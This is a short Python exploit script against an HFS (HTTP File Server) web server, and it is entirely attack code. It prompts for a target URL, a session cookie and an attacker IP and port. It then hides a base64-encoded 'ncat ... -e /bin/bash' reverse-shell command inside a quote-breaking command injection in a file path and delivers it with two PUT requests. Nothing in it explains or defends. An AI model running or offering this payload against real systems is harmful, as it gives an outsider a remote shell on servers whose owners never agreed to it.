import requests as req import base64 import time url = input("Url (Example http://hfs.victim/{{folder}}/: ") cookie = input("Cookie: ") ip = input("Ip: ") port = input("Port: ") headers = {"x-hfs-anti-csrf":"1","Cookie":cookie} command = "ncat {0} {1} -e /bin/bash".format(ip,port) command = command.encode('utf-8') payload = 'poc";python3 -c "import os;import base64;os.system(base64.b64decode(\''+base64.b64encode(command).decode('utf-8')+"'))" print("Send request 1") send_1 = req.put(url+payload+"/poc.txt",headers=headers, data="poc") print("Delay for 3 seconds.") time.sleep(3) print("Send request 2") print("Execute payload") send_2 = req.put(url+payload+"/poc.txt",headers=headers, data="poc")
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